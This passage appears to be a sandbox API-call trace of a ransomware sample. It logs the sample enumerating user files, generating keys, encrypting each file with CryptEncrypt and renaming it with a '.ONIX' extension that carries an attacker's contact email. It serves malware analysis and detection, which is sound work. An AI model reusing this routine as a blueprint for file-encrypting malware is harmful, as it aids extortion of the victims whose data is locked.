lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.148] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.148] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.148] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.148] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.148] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dIJde7stMV h 8B9NLQ.bmp", dwFileAttributes=0x80) returned 1 [0129.148] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dIJde7stMV h 8B9NLQ.bmp") returned 70 [0129.148] GetProcessHeap () returned 0x410000 [0129.148] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xfc) returned 0x4d8e98 [0129.148] lstrcpyW (in: lpString1=0x4d8e98, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dIJde7stMV h 8B9NLQ.bmp" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dIJde7stMV h 8B9NLQ.bmp") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dIJde7stMV h 8B9NLQ.bmp" [0129.148] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dIJde7stMV h 8B9NLQ.bmp", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dIJde7stMV h 8B9NLQ.bmp.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dIJde7stMV h 8B9NLQ.bmp.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.148] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=24139) returned 1 [0129.148] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x5e4b [0129.148] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.148] GetProcessHeap () returned 0x410000 [0129.148] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8fa0 [0129.148] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8fa0*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8fa0*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.148] WriteFile (in: hFile=0x524, lpBuffer=0x4d8fa0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8fa0*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.150] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.151] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.152] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x5e4b) returned 0x4e1b68 [0129.152] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x5e4b) returned 0xf70048 [0129.153] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.153] ReadFile (in: hFile=0x524, lpBuffer=0x4e1b68, nNumberOfBytesToRead=0x5e4b, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e1b68*, lpNumberOfBytesRead=0x367f44c*=0x5e4b, lpOverlapped=0x0) returned 1 [0129.155] UnlockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x5e4b, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.155] CloseHandle (hObject=0x524) returned 1 [0129.155] GetProcessHeap () returned 0x410000 [0129.155] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8fa0 | out: hHeap=0x410000) returned 1 [0129.155] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dIJde7stMV h 8B9NLQ.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\dijde7stmv h 8b9nlq.bmp"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dIJde7stMV h 8B9NLQ.bmp.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\dijde7stmv h 8b9nlq.bmp.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.160] GetProcessHeap () returned 0x410000 [0129.160] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.160] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x70d1def0, ftCreationTime.dwHighDateTime=0x1d5e2e8, ftLastAccessTime.dwLowDateTime=0x22bcffb0, ftLastAccessTime.dwHighDateTime=0x1d5e0bd, ftLastWriteTime.dwLowDateTime=0x22bcffb0, ftLastWriteTime.dwHighDateTime=0x1d5e0bd, nFileSizeHigh=0x0, nFileSizeLow=0x18356, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dY JxzMSxO_u5ZgyK.mp3", cAlternateFileName="DYJXZM~1.MP3")) returned 1 [0129.160] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dY JxzMSxO_u5ZgyK.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\dy jxzmsxo_u5zgyk.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x524 [0129.160] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.160] LockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x18356, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.160] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.160] ReadFile (in: hFile=0x524, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.161] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.161] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.161] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.161] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.161] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dY JxzMSxO_u5ZgyK.mp3", dwFileAttributes=0x80) returned 1 [0129.161] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dY JxzMSxO_u5ZgyK.mp3") returned 68 [0129.161] GetProcessHeap () returned 0x410000 [0129.161] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf8) returned 0x431d68 [0129.162] lstrcpyW (in: lpString1=0x431d68, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dY JxzMSxO_u5ZgyK.mp3" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dY JxzMSxO_u5ZgyK.mp3") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dY JxzMSxO_u5ZgyK.mp3" [0129.162] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dY JxzMSxO_u5ZgyK.mp3", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dY JxzMSxO_u5ZgyK.mp3.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dY JxzMSxO_u5ZgyK.mp3.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.162] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=99158) returned 1 [0129.162] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x18356 [0129.162] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.162] GetProcessHeap () returned 0x410000 [0129.162] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0129.162] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.162] WriteFile (in: hFile=0x524, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.163] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.164] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.166] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x18356) returned 0xf70048 [0129.167] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x18356) returned 0xf883a8 [0129.167] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.167] ReadFile (in: hFile=0x524, lpBuffer=0xf70048, nNumberOfBytesToRead=0x18356, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf70048*, lpNumberOfBytesRead=0x367f44c*=0x18356, lpOverlapped=0x0) returned 1 [0129.171] UnlockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x18356, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.171] CloseHandle (hObject=0x524) returned 1 [0129.171] GetProcessHeap () returned 0x410000 [0129.171] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.171] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dY JxzMSxO_u5ZgyK.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\dy jxzmsxo_u5zgyk.mp3"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dY JxzMSxO_u5ZgyK.mp3.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\dy jxzmsxo_u5zgyk.mp3.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.175] GetProcessHeap () returned 0x410000 [0129.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x431d68 | out: hHeap=0x410000) returned 1 [0129.175] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd34d15e0, ftCreationTime.dwHighDateTime=0x1d5d852, ftLastAccessTime.dwLowDateTime=0xa9b6ec30, ftLastAccessTime.dwHighDateTime=0x1d5df21, ftLastWriteTime.dwLowDateTime=0xa9b6ec30, ftLastWriteTime.dwHighDateTime=0x1d5df21, nFileSizeHigh=0x0, nFileSizeLow=0x10e3d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fIXio0.flv", cAlternateFileName="")) returned 1 [0129.175] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fIXio0.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\fixio0.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x524 [0129.175] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.175] LockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10e3d, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.175] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.175] ReadFile (in: hFile=0x524, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.176] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.176] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.176] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.176] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.176] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fIXio0.flv", dwFileAttributes=0x80) returned 1 [0129.176] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fIXio0.flv") returned 57 [0129.176] GetProcessHeap () returned 0x410000 [0129.176] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe2) returned 0x467908 [0129.176] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fIXio0.flv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fIXio0.flv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fIXio0.flv" [0129.176] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fIXio0.flv", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fIXio0.flv.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fIXio0.flv.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.177] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=69181) returned 1 [0129.177] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x10e3d [0129.177] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.177] GetProcessHeap () returned 0x410000 [0129.177] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0129.177] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.177] WriteFile (in: hFile=0x524, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.179] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.180] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.180] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10e3d) returned 0xf70048 [0129.181] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10e3d) returned 0xf80e90 [0129.181] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.181] ReadFile (in: hFile=0x524, lpBuffer=0xf70048, nNumberOfBytesToRead=0x10e3d, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf70048*, lpNumberOfBytesRead=0x367f44c*=0x10e3d, lpOverlapped=0x0) returned 1 [0129.184] UnlockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10e3d, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.184] CloseHandle (hObject=0x524) returned 1 [0129.185] GetProcessHeap () returned 0x410000 [0129.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.185] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fIXio0.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\fixio0.flv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fIXio0.flv.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\fixio0.flv.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.188] GetProcessHeap () returned 0x410000 [0129.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0129.188] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29997d20, ftCreationTime.dwHighDateTime=0x1d5d8db, ftLastAccessTime.dwLowDateTime=0x16d5ee00, ftLastAccessTime.dwHighDateTime=0x1d5da2d, ftLastWriteTime.dwLowDateTime=0x16d5ee00, ftLastWriteTime.dwHighDateTime=0x1d5da2d, nFileSizeHigh=0x0, nFileSizeLow=0x176e1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GuEEjHxr0yfpOAOZY_AJ.flv", cAlternateFileName="GUEEJH~1.FLV")) returned 1 [0129.190] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\GuEEjHxr0yfpOAOZY_AJ.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gueejhxr0yfpoaozy_aj.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x524 [0129.190] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.190] LockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x176e1, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.190] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.190] ReadFile (in: hFile=0x524, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.191] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.191] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.191] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.191] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.191] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\GuEEjHxr0yfpOAOZY_AJ.flv", dwFileAttributes=0x80) returned 1 [0129.192] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\GuEEjHxr0yfpOAOZY_AJ.flv") returned 71 [0129.192] GetProcessHeap () returned 0x410000 [0129.192] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xfe) returned 0x4d8e98 [0129.192] lstrcpyW (in: lpString1=0x4d8e98, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\GuEEjHxr0yfpOAOZY_AJ.flv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\GuEEjHxr0yfpOAOZY_AJ.flv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\GuEEjHxr0yfpOAOZY_AJ.flv" [0129.192] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\GuEEjHxr0yfpOAOZY_AJ.flv", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\GuEEjHxr0yfpOAOZY_AJ.flv.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\GuEEjHxr0yfpOAOZY_AJ.flv.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.192] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=95969) returned 1 [0129.192] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x176e1 [0129.192] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.192] GetProcessHeap () returned 0x410000 [0129.192] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8fa0 [0129.192] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8fa0*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8fa0*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.192] WriteFile (in: hFile=0x524, lpBuffer=0x4d8fa0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8fa0*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.194] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.195] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.196] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x176e1) returned 0xf70048 [0129.196] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x176e1) returned 0xf87738 [0129.196] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.196] ReadFile (in: hFile=0x524, lpBuffer=0xf70048, nNumberOfBytesToRead=0x176e1, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf70048*, lpNumberOfBytesRead=0x367f44c*=0x176e1, lpOverlapped=0x0) returned 1 [0129.200] UnlockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x176e1, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.200] CloseHandle (hObject=0x524) returned 1 [0129.201] GetProcessHeap () returned 0x410000 [0129.201] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8fa0 | out: hHeap=0x410000) returned 1 [0129.201] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\GuEEjHxr0yfpOAOZY_AJ.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gueejhxr0yfpoaozy_aj.flv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\GuEEjHxr0yfpOAOZY_AJ.flv.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: 